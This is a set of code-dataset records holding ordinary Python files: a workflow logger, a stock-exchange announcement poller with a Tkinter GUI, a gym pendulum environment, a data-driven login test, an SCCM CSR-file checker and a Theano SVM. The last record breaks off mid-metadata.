+{"seq_id": "362134444", "text": "import json\nimport requests\n\n\ndef get_queue_name(service_id):\n f = open('./api/workflow.json')\n data = json.load(f)\n\n queue_name = '-'\n for x in data:\n for key, value in x.items():\n if key == service_id:\n queue_name = value\n\n f.close()\n\n params = {\"service_id\": service_id,\n \"queue_name\": queue_name}\n requests.post('http://127.0.0.1:5001/api/v1/skipper/logger/log_workflow', json=params)\n\n return queue_name\n", "sub_path": "workflow/api/workflow.py", "file_name": "workflow.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "369458710", "text": "import requests\nimport datetime\nimport tkinter as tk\nimport tkinter.font as tk_font\nimport webbrowser\nfrom playsound import playsound\nimport os\nimport time\n\n\ndef open_link(rep_id):\n webbrowser.open(f'https://maya.tase.co.il/reports/details/{rep_id}')\n\n\ndef get_reports():\n headers = {\n 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/plain, */*',\n 'DNT': '1',\n 'Accept-Language': 'he-IL',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/85.0.4183.83 Safari/537.36',\n 'X-Maya-With': 'allow',\n 'Origin': 'https://maya.tase.co.il',\n 'Sec-Fetch-Site': 'same-site',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Dest': 'empty',\n 'Referer': 'https://maya.tase.co.il/reports/breakingannouncement',\n }\n\n try:\n response = requests.get('https://mayaapi.tase.co.il/api/report/breakingannouncement', headers=headers)\n except:\n print('request timed out. sleeping for 30 seconds...')\n time.sleep(30)\n return get_reports()\n\n top_reports = []\n for report in response.json()['Reports'][:5]:\n try:\n try:\n date = datetime.datetime.strptime(report['PubDate'], '%Y-%m-%dT%H:%M:%S.%f').strftime('%H:%M %d/%m/%Y')\n except:\n date = report['PubDate']\n top_reports.append({\n 'id': report['RptCode'],\n 'text': report['Subject'].strip(),\n 'date': date,\n 'company': report['FormalCompanyData']['CompanyName'].strip()\n })\n except Exception as e:\n pass\n return top_reports\n\n\ndef render_reports(reports):\n for wd in root.winfo_children():\n wd.destroy()\n\n for i, report in enumerate(reports):\n main_frame = tk.Frame(master=root, padx=5, bg='#e1e1e1', highlightbackground=\"#cccccc\",\n highlightthickness=1)\n upper_frame = tk.Frame(master=main_frame, pady=3)\n tk.Label(upper_frame, text=f'{report[\"date\"]} ', font=fontStyle,\n width=15, bg='#ff8e6e').grid(row=0, column=0, sticky=tk.W)\n tk.Label(upper_frame, text=report['company'], font=fontStyle, width=25, bg='#ff8e6e').grid(row=0, column=1)\n tk.Button(\n upper_frame, text='open link',\n command=lambda rep_id=report['id']: open_link(rep_id)\n ).grid(row=0, column=2, sticky=tk.E)\n\n lower_frame = tk.Frame(master=main_frame, pady=3)\n tk.Label(lower_frame, text=report['text'], font=fontStyle,\n wraplength=400, anchor=tk.E, width=47).grid(row=0, column=0)\n upper_frame.grid(row=0, column=0, columnspan=2)\n lower_frame.grid(row=1, column=0)\n main_frame.grid(row=i, column=0)\n\n\ndef check_for_updates():\n global report_ids\n print('checking for updates...')\n\n reports = get_reports()\n new_report_ids = [report['id'] for report in reports]\n if not report_ids:\n report_ids = new_report_ids\n render_reports(reports)\n else:\n if report_ids != new_report_ids:\n report_ids = new_report_ids\n print('reports updated')\n playsound(sound_file)\n render_reports(reports)\n else:\n pass\n root.after(3000, check_for_updates)\n\n\nif __name__ == '__main__':\n sound_file = os.path.join(os.path.dirname(__file__), 'beep.mp3')\n root = tk.Tk()\n root.title(\"Check Reports\")\n root.resizable(False, False)\n fontStyle = tk_font.Font(size=12)\n report_ids = None\n\n check_for_updates()\n root.mainloop()\n", "sub_path": "check_breaking_announcements.py", "file_name": "check_breaking_announcements.py", "file_ext": "py", "file_size_in_byte": 3683, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "webbrowser.open", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 64, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.E", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 74, "usage_type": "call"}, {"api_name": "tkinter.E", "line_number": 75, "usage_type": "attribute"}, {"api_name": "playsound.playsound", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 102, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 103, "usage_type": "call"}, {"api_name": "tkinter.font.Font", "line_number": 106, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 106, "usage_type": "name"}]}
+{"seq_id": "147603329", "text": "from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nfrom gym import spaces\nfrom gym_brt.envs.qube_base_env import \\\n QubeBaseEnv, \\\n normalize_angle, \\\n ACTION_HIGH, \\\n ACTION_LOW\n\n\nclass QubeBeginDownReward(object):\n def __init__(self):\n self.target_space = spaces.Box(\n low=ACTION_LOW,\n high=ACTION_HIGH, dtype=np.float32)\n\n def __call__(self, state, action):\n theta_x = state[0]\n theta_y = state[1]\n alpha_x = state[2]\n alpha_y = state[3]\n theta_velocity = state[4]\n alpha_velocity = state[5]\n theta_acceleration = state[6]\n alpha_acceleration = state[7]\n\n theta = np.arctan2(theta_y, theta_x) # arm\n alpha = np.arctan2(alpha_y, alpha_x) # pole\n\n cost = normalize_angle(theta)**4 + \\\n normalize_angle(alpha)**2 + \\\n 0.1 * alpha_velocity**2\n\n reward = -cost\n return reward\n\n\nclass QubeBeginDownEnv(QubeBaseEnv):\n def __init__(self, frequency=1000, use_simulator=False):\n super(QubeBeginDownEnv, self).__init__(\n frequency=frequency,\n use_simulator=use_simulator)\n self.reward_fn = QubeBeginDownReward()\n\n\ndef main():\n num_episodes = 10\n num_steps = 250\n\n with QubeBeginDownEnv() as env:\n for episode in range(num_episodes):\n state = env.reset()\n for step in range(num_steps):\n action = env.action_space.sample()\n state, reward, done, _ = env.step(action)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "gym_brt/envs/qube_begin_down_env.py", "file_name": "qube_begin_down_env.py", "file_ext": "py", "file_size_in_byte": 1643, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "gym.spaces.Box", "line_number": 16, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 16, "usage_type": "name"}, {"api_name": "gym_brt.envs.qube_base_env.ACTION_LOW", "line_number": 17, "usage_type": "name"}, {"api_name": "gym_brt.envs.qube_base_env.ACTION_HIGH", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 31, "usage_type": "call"}, {"api_name": "gym_brt.envs.qube_base_env.normalize_angle", "line_number": 33, "usage_type": "call"}, {"api_name": "gym_brt.envs.qube_base_env.normalize_angle", "line_number": 34, "usage_type": "call"}, {"api_name": "gym_brt.envs.qube_base_env.QubeBaseEnv", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "428736258", "text": "#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n# email: wagyu2016@163.com\n# wechat: shoubian01\n# author: 王雨泽\n\"\"\"\nddt: 数据驱动思想:data driven testing\n你会 data driven testing 数据驱动思想。\n\n现在所说的是一个叫做 ddt 的 python 库\nddt 库是和 unittest 搭配起来使用的, 是 unittest 的一个插件。\npython / unittest / ddt 自动化测试框架\n\n\n@ddt.ddt 没有括号\nclass TestDemo:\n\n @ddt.data() 右括号\n def test_demo(self):\n pass\n\n\"\"\"\nimport unittest\nimport ddt\n\nfrom class_19_excel.common.excel_handler import ExcelHandler\nfrom class_19_excel.common.requests_handler import RequestsHandler\n\n\n\ntest_data = [\n {\"url\": \"http://120.78.128.25:8766/futureloan/member/login\",\n \"method\": \"post\",\n \"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\"},\n \"data\": {\"mobile_phone\": \"18111111111\", \"pwd\": \"12345678\"},\n \"expected\": {\"msg\":\"\", \"code\":\"\"}},\n\n {\"url\": \"http://120.78.128.25:8766/futureloan/member/login\",\n \"method\": \"post\",\n \"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\"},\n \"data\": {\"mobile_phone\": \"1811\", \"pwd\": \"123\"},\n \"expected\": \"hello world\"},\n ]\n\n\ntest_data = ExcelHandler(r\"d:\\cases.xlsx\").read('Sheet1')\nprint(test_data)\n\n\n@ddt.ddt\nclass TestLogin(unittest.TestCase):\n\n # def setUp(self) -> None:\n\n # 前置条件当中\n # 每一个测试用例方法执行之前都会运行的代码\n def setUp(self):\n pass\n\n def tearDown(self):\n print(\"测试用例执行完毕。\")\n\n @ddt.data(*test_data)\n # 将 *test_data 当中的一组测试数据 赋值到 data_info 这个参数\n def test_login(self, data_info):\n res = RequestsHandler().visit(data_info['url'],\n data_info['method'],\n json=data_info['data'],\n headers=data_info['headers'])\n\n self.assertEqual(res, data_info['expected'])\n\n\nif __name__ == '__main__':\n unittest.main()\n # test_login()\n\n", "sub_path": "python 25 code/class19_20200102_excel_ddt/yuz/test_cases/test_login.py", "file_name": "test_login.py", "file_ext": "py", "file_size_in_byte": 2074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "class_19_excel.common.excel_handler.ExcelHandler", "line_number": 46, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 51, "usage_type": "attribute"}, {"api_name": "class_19_excel.common.requests_handler.RequestsHandler", "line_number": 66, "usage_type": "call"}, {"api_name": "ddt.data", "line_number": 63, "usage_type": "call"}, {"api_name": "ddt.ddt", "line_number": 50, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "410041375", "text": "#!/usr/bin/env python\n'''\n Usage:\n findMissingCSR.py [-h] [-v]\n [-y YEAR]\n [-m {01,02,03,04,05,06,07,08,09,10,11,12}]\n [-d {01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,\n 21,22,23,24,25,26,27,28,29,30,31}]\n\n Optional arguments:\n -h, --help\n show this help message and exit\n -v, --verbose\n Will print INFO, WARNING, and ERROR messages to the stdout or stderr\n -y YEAR, --year YEAR The year in CCYY format. \n Defaults to the current year.\n -m {01,02,03,04,05,06,07,08,09,10,11,12},\n --month {01,02,03,04,05,06,07,08,09,10,11,12}\n The two-digit number of the month (01-12). Defaults to\n the current month.\n -d {01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,\n 21,22,23,24,25,26,27,28,29,30,31}, \n --day {01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16,17,18,19,20,\n 21,22,23,24,25,26,27,28,29,30,31}\n The two-digit number of the day. Defaults to the current day.\n -a, --allday\n Check all 24 hours of the day (00:00:00 to 23:00:00).\n -u, --uptonow\n Check all hours of the day up to 'now' (00:00:00 to XX:00:00).\n\n Description:\n This program will check the CSR files from MCS looking for missing data.\n It will make a list of the \"missing hours\" and notify the appropriate \n people (i.e. the people listed under the MCS_checker group in the \n distribution list JSON file.)\n Not to be confused with csr_checker.py\n\n Author:\n Alan Verdugo (alanvemu@mx1.ibm.com)\n\n Creation date:\n 2016-11-21\n\n Modification list:\n CCYY-MM-DD Author Description\n 2017-11-21 Alan Verdugo Improved error checking.\n 2017-11-23 Alan Verdugo All time-handling is now done in \n UTC.\n We now also check if the metadata \n fields are present in every CSR \n record.\n Minor improvements.\n'''\n\n# Needed for system and environment information.\nimport os\n\n# Needed for system and environment information.\nimport sys\n\n# Needed for system and environment information.\nimport socket\n\n# For timestamp information in the email subject.\nfrom datetime import datetime\n\n# Handling arguments.\nimport argparse\n\n# Custom module for email sending (refer to emailer.py)\nimport emailer\n\n# Handle logging.\nimport logging\n\n# to read the CSR file(s).\nimport csv\n\n# To get the providers from its \"JSON\" file.\nimport json\n\n\n# Home of the SCCM installation.\nsccm_home = os.path.join(os.sep, \"opt\", \"ibm\", \"sccm\")\n\n# The path where this script and the distribution list are located.\nbinary_home = os.path.join(sccm_home, \"bin\", \"custom\")\n\n# Location path of SCCM collector logs.\nCOLLECTOR_LOGS = os.path.join(sccm_home, \"samples\", \"logs\", \"collectors\")\n\n# Path where MCS data resides.\nmcs_home = os.path.join(sccm_home,'wlp', 'usr', 'servers', 'mcs')\n\n# MCS configuration file of providers.\nprovider_file = os.path.join(mcs_home, 'data', 'providers.json')\n\n# Logs home directory.\nlog_dir = os.path.join(os.sep, \"tmp\", \"logs\", \"sccm\")\nlog_filename = \"checkMCS_\" + str(datetime.now().strftime(\"%Y%m%d\")) + \".log\"\nfull_log_file_name = os.path.join(log_dir, log_filename)\n\n# The hostname where this is running.\nhostname = socket.gethostname()\n\n# Email sender address.\nemail_from = \"SCCM_\" + hostname + \"@\" + hostname\n\n# List of metadata fields that should be present in every CSR record.\nmetadata = [\"ActionInProgress\", \"NetworkZone\", \"TemplateName\"]\n\n# JSON Object of mail_list_file.\nmail_list = \"\"\n\n# Email distribution group.\ndistribution_group = \"MCS_checker\"\n\n# Error list initialization (just in case we need it).\nerrors = []\nerrors_found = False\n\n# Logging configuration.\nlog = logging.getLogger(\"findMissingCSR\")\nlogging.basicConfig(filemode = 'a')\nfh = logging.FileHandler(full_log_file_name)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nlog.addHandler(fh)\n\n\ndef handle_error(error):\n '''\n To avoid duplication of code, this function will take an error message \n and append it to the \"errors\" list (which then will be used to build \n the notification email). It will also log the error and set the \n boolean variable \"errors_found\" to True.\n '''\n global errors_found\n errors_found = True\n errors.append(error)\n log.error(error)\n\n\ndef get_providers():\n '''\n (Based on Scott's get_providers.py)\n The providers file, for ridiculous and mysterious reason stores one JSON \n object per line, so we cannot parse the file in the normal way. We have \n to parse each line as if it were a complete JSON file.\n '''\n try:\n providers = []\n with open(provider_file, \"rb\") as file_handle:\n for row in file_handle:\n provider_line = json.loads(row)\n providers.append(provider_line['provider_name'])\n return providers\n except Exception as exception:\n handle_error(\"Error reading providers file {0} \\nException: \"\\\n \"{1}\".format(provider_file, exception))\n\n\ndef search_metadata(row):\n '''\n This function will receive a CSR record and look for all the value of \n the metadata list in it. If all the values are found in the record, it \n will return True, otherwise it will return False (so, if any metadata\n field is missing, we will get an alert).\n '''\n found_fields = 0\n for field in metadata:\n if field in row:\n found_fields += 1\n if found_fields == len(metadata):\n return True\n else:\n return False\n\n\ndef main(full_date, all_day, up_to_now):\n # Initializing the errors list with a \"header\" value.\n errors.append(\"The following errors were found while verifying the MCS \"\\\n \"data for {0} in {1}:\\n\".format(full_date, hostname))\n\n # Get a list of providers using the get_providers() function.\n providers = get_providers()\n if providers is None:\n handle_error(\"No active MCS providers were found in {0}\"\\\n .format(provider_file))\n else:\n # Infer the \"process\" from the provider name.\n for provider in providers:\n if provider.endswith(\"_nova\"):\n process = \"nova_compute\"\n elif provider.endswith(\"_cinder\"):\n # per Charlotte Despres, ICO's OpenStack cinder does not support \n # additional volumes with VMware, so we expect no records.\n # Let's just silently ignore any cinder providers with \"VMWARE\" \n # on their names.\n if \"VMWARE\" in provider:\n log.info(\"Ignoring provider {0} (Currently, there is no \"\\\n \"support for VMware cinder).\".format(provider))\n continue\n else:\n process = \"cinder_volume\"\n else:\n handle_error(\"The provider {0} is not valid.\".format(provider))\n feed = provider\n\n log.info(\"Checking CSR files for {0}...\\n\\tIn feed: {1}\\n\\tIn \"\\\n \"process: {2}\".format(full_date, feed, process))\n\n # Build the full path and filename of the input file.\n input_file = full_date + \".txt\"\n input_file_path = os.path.join(COLLECTOR_LOGS, process, feed)\n full_input_file = os.path.join(input_file_path, input_file)\n\n # Ensure the input file exist.\n if os.path.exists(input_file_path):\n if os.path.isfile(full_input_file):\n log.info(\"Now checking {0}\".format(full_input_file))\n else:\n handle_error(\"The file {0} does not exist or is not a \"\\\n \"valid file.\".format(full_input_file))\n else:\n handle_error(\"The directory {0} does not exist or is not a \"\\\n \"valid directory.\".format(input_file_path))\n\n # Read the CSR file and get the unique contents of the fourth \n # column (which is the start time of the MCS entry with format \n # HH:MM:SS).\n file_hours = []\n try:\n with open(full_input_file, \"rb\") as file_handle:\n reader = csv.reader(file_handle)\n for row in reader:\n if row[3] not in file_hours:\n file_hours.append(row[3])\n # Search for metadata fields in the record.\n if search_metadata(row) == False:\n handle_error(\"Missing metadata field(s) in the \"\\\n \"following record:\\n{0}\\n\".format(row))\n except Exception as exception:\n handle_error(\"Error reading CSR input file {0} \\nException: \"\\\n \"{1}\".format(full_input_file, exception))\n\n # Get the current timestamp and remove the minutes and seconds.\n # RabbitMQ events use UTC timestamps so all timestamps in this code \n # should be handled in UTC.\n rounded_current_hour = datetime.utcnow().strftime(\"%H\")\n rounded_current_time = datetime.utcnow().replace(minute=0, \n second=0).strftime(\"%H:%M:%S\")\n\n # According to what the user specified, build list of hours for \n # comparison against the content of the CSR file.\n comparison_hours = []\n if all_day == True:\n # Build a list with all the hours of the day.\n log.info(\"Now checking entries from 00:00:00 to 23:00:00...\")\n for i in range(0, 24):\n # (range() is not inclusive so we need to add 1 for \n # convenience)\n hour = datetime.now().replace(hour=i, minute=0, second=0)\\\n .strftime(\"%H:%M:%S\")\n if hour not in comparison_hours:\n comparison_hours.append(hour)\n elif up_to_now == True:\n # Build a list with all the hours up until now.\n log.info(\"Now checking entries from 00:00:00 to {0}...\"\\\n .format(rounded_current_time))\n for i in range(0, int(rounded_current_hour)+1):\n # (range() is not inclusive so we need to add 1 for \n # convenience)\n hour = datetime.now().replace(hour=i, minute=0, second=0)\\\n .strftime(\"%H:%M:%S\")\n if hour not in comparison_hours:\n comparison_hours.append(hour)\n else:\n # We will check only the current hour.\n log.info(\"Now checking entries for {0}...\"\\\n .format(rounded_current_time))\n comparison_hours.append(rounded_current_time)\n\n # Any missing entries/hours in the CSR should be reported.\n for hour in comparison_hours:\n if hour not in file_hours:\n handle_error(\"Missing MCS entries for {0} (process: \"\\\n \"{1}, feed: {2})\".format(hour, process, feed))\n else:\n log.info(\"Entries found for {0}\".format(hour))\n\n # If there are missing entries/hours, notify the heroic billing team.\n if errors_found == True:\n attachments = []\n attachments.append(full_log_file_name)\n errors.append(\"\\nFor more information, refer to the logfile {0}, \"\\\n \"(which is attached to this email) or check the actual CSR files \"\\\n \"in {1}.\\n\".format(full_log_file_name, COLLECTOR_LOGS))\n error_message_string = \"\\n\".join(errors)\n # Send an email informing of any problems found.\n emailer.build_email(distribution_group,\n \"ERROR: MCS collection missing CSR records in {0}\".format(hostname), \n email_from,\n error_message_string, \n attachments)\n\n\ndef get_args(argv):\n '''\n Get, validate and parse arguments.\n '''\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\",\n help = \"Will print INFO, WARNING, and ERROR messages to the stdout \"\\\n \"or stderr.\",\n dest = \"verbose\",\n default = False,\n action = \"store_true\")\n parser.add_argument(\"-y\",\"--year\",\n help = \"The year in CCYY format. Defaults to the current year (in UTC)\",\n dest = \"year\",\n default = datetime.utcnow().strftime(\"%Y\"))\n parser.add_argument(\"-m\",\"--month\",\n help = \"The two-digit number of the month (01-12). Defaults to the \"\\\n \"current month (in UTC).\",\n dest = \"month\",\n default = datetime.utcnow().strftime(\"%m\"),\n choices = ['01','02','03','04','05','06','07','08','09','10','11',\n '12'])\n parser.add_argument(\"-d\",\"--day\",\n help = \"The two-digit number of the day. Defaults to the current day.\",\n dest = \"day\",\n default = datetime.utcnow().strftime(\"%d\"),\n choices = ['01','02','03','04','05','06','07','08','09','10',\n '11','12','13','14','15','16','17','18','19','20',\n '21','22','23','24','25','26','27','28','29','30','31'])\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-a\", \"--allday\",\n help = \"Check all 24 hours of the day (00:00:00 to 23:00:00).\",\n dest = \"all_day\",\n default = False,\n action = \"store_true\")\n group.add_argument(\"-u\", \"--uptonow\",\n help = \"Check all hours of the day up to 'now' (from 00:00:00 to \"\\\n \"XX:00:00) in UTC.\",\n dest = \"up_to_now\",\n default = False,\n action = \"store_true\")\n args = parser.parse_args()\n\n # Ensure that we have a valid date.\n try:\n full_date = datetime(year=int(args.year),\n month=int(args.month),\n day=int(args.day)).strftime(\"%Y%m%d\")\n except Exception as exception:\n logging.error(\"Provided date is invalid. {0}\".format(exception))\n exit(3)\n\n # Set logging level.\n if args.verbose:\n log.setLevel(logging.INFO)\n\n # Call the main function with the appropriate mode.\n main(full_date, args.all_day, args.up_to_now)\n\n\nif __name__ == \"__main__\":\n # Parse arguments from the CLI.\n get_args(sys.argv[1:])\nexit(0)\n", "sub_path": "findMissingCSR.py", "file_name": "findMissingCSR.py", "file_ext": "py", "file_size_in_byte": 14675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 99, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 104, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 126, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 235, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 250, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 250, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 251, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 251, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 263, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 263, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 274, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 274, "usage_type": "name"}, {"api_name": "emailer.build_email", "line_number": 301, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 312, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 322, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 322, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 327, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 327, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 333, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 333, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 357, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 362, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 370, "usage_type": "attribute"}]}
+{"seq_id": "613170323", "text": "# coding : utf-8\n\n\"\"\"\nSupport vector machine for multiclass classificcation problems.\n\"\"\"\n\nfrom __future__ import print_function, absolute_import, division, unicode_literals\nimport sys\nimport time\nfrom logging import getLogger, DEBUG, ERROR\nimport numpy as np\nimport theano\nimport theano.tensor as T\nfrom resfgb.utils import minibatches\nfrom resfgb.models import layers as L\nfrom resfgb.models.classifier import Classifier\nfrom resfgb.optimizers import AGD\n\nlogger = getLogger(__name__)\n\n\nclass SVM(Classifier):\n def __init__(self, shape, bias=True, wr=0, eta=1e-2, momentum=0.9, gamma=1e+0,\n scale=1., minibatch_size=10, eval_iters=1000, seed=99,\n log_level=DEBUG):\n \"\"\"\n shape : tuple of integers.\n Dimension and the number of classes\n bias : flag for whether to use bias or not.\n wr : float.\n The L2-regularization paremter.\n opt_params : dictionary.\n minibatch_size : integer.\n Minibatch size to calcurate stochastic gradient.\n seed : integer.\n Seed for random module.\n \"\"\"\n super(SVM, self).__init__(eta, scale, minibatch_size, eval_iters, seed,\n log_level)\n\n self.show_param(shape, wr, eta, momentum, scale, minibatch_size,\n eval_iters, seed) \n\n # input symbols.\n self.Z = T.matrix(dtype=theano.config.floatX)\n self.Y = T.ivector()\n self.symbols = [self.Z, self.Y]\n\n # parameters.\n W = L.linear_param(shape[0], shape[1], scale=5e-2)\n b = L.zeros_param(shape[1])\n if bias:\n self.params = [b, W]\n else:\n self.params = [W]\n\n # functions.\n A = L.FullConnect(self.Z, self.params) # (n,K), K is the number of classes.\n margin = A[T.arange(self.Y.shape[0]), self.Y][:, None] - A # (n,K)\n self.loss = T.mean(T.sum(T.nnet.softplus(gamma - margin), axis=1))\n # self.loss = T.mean(T.sum(T.maximum(gamma - margin, 0.), axis=1))\n self.pred = T.argmax(A, axis=1)\n\n if wr > 0:\n self.wr = wr\n if bias:\n self.reg = 0.5 * wr * T.sum(self.params[1]**2)\n else:\n self.reg = 0.5 * wr * T.sum(self.params[0]**2)\n else:\n logger.log(ERROR,\n 'negative regularization parameter is given: {0}'.format(wr))\n sys.exit(-1) \n\n self.sgrad = T.grad(cost=self.loss + self.reg, wrt=self.params)\n\n # compile.\n self.compile()\n\n # optimizer.\n self.optimizer = AGD(self, eta=eta, momentum=momentum)\n\n def show_param(self, shape, wr, eta, momentum, scale, minibatch_size,\n eval_iters, seed):\n logger.info('{0:<5}{1:^26}{2:>5}'.format('-' * 5, 'SVM setting', '-' * 5))\n logger.info('{0:<15}{1:>21}'.format('dim', shape[0]))\n logger.info('{0:<15}{1:>21}'.format('n_class', shape[1]))\n logger.info('{0:<15}{1:>21.7}'.format('wr', wr))\n logger.info('{0:<15}{1:>21.7f}'.format('eta', eta))\n logger.info('{0:<15}{1:>21.7f}'.format('momentum', momentum))\n logger.info('{0:<15}{1:>21.7f}'.format('scale', scale))\n logger.info('{0:<15}{1:>21}'.format('minibatch_size', minibatch_size))\n logger.info('{0:<15}{1:>21}'.format('eval_iters', eval_iters)) \n logger.info('{0:<15}{1:>21}'.format('seed', seed))\n\n def compile(self):\n self.predict = theano.function([self.Z], self.pred)\n self.loss_func = theano.function([self.Z, self.Y], self.loss)\n self.reg_func = theano.function([], self.reg)\n", "sub_path": "resfgb/models/svm.py", "file_name": "svm.py", "file_ext": "py", "file_size_in_byte": 3770, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "resfgb.models.classifier.Classifier", "line_number": 22, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 25, "usage_type": "name"}, {"api_name": "theano.tensor.matrix", "line_number": 45, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 45, "usage_type": "name"}, {"api_name": "theano.config", "line_number": 45, "usage_type": "attribute"}, {"api_name": "theano.tensor.ivector", "line_number": 46, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "resfgb.models.layers.linear_param", "line_number": 50, "usage_type": "call"}, {"api_name": "resfgb.models.layers", "line_number": 50, "usage_type": "name"}, {"api_name": "resfgb.models.layers.zeros_param", "line_number": 51, "usage_type": 